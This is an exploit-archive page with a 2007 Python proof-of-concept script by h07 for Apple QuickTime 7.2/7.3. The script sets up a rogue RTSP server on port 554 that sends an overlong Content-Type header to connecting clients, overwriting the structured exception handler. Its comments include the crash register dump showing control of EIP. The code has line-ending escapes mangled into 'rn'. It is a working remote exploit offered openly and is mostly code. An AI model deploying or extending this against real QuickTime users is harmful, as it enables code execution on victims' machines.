Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC
# Published : 2007-11-23
# Author : h07
# Previous Title : Windows Media Player AIFF Divide By Zero Exception DoS PoC
# Next Title : Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC

#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish
# Details:..
#
# (RTSP) Content-Type: [A * 995] + [B * 4096]rn
#
# 0x41414141  Pointer to next SEH record
# 0x42424242  SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [42424242])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00
# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
#               --> N/A
# ----------------------------------------------------------------
##

from socket import *

header = (
'RTSP/1.0 200 OKrn'
'CSeq: 1rn'
'Date: 0x00 :Prn'
'Content-Base: rtsp://0.0.0.0/1.mp3/rn'
'Content-Type: %srn' # <-- overflow
'Content-Length: %drn'
'rn')

body = (
'v=0rn'
'o=- 16689332712 1 IN IP4 0.0.0.0rn'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'i=1.mp3rn'
't=0 0rn'
'a=tool:ciamciaramciarn'
'a=type:broadcastrn'
'a=control:*rn'
'a=range:npt=0-213.077rn'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'a=x-qt-text-inf:1.mp3rn'
'm=audio 0 RTP/AVP 14rn'
'c=IN IP4 0.0.0.0rn'
'a=control:track1rn'
)

tmp = "A" * 995
tmp += "B" * 4096
header %= (tmp, len(body))
evil = header + body

s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()

# EoF

# www.Syue.com [2007-11-23]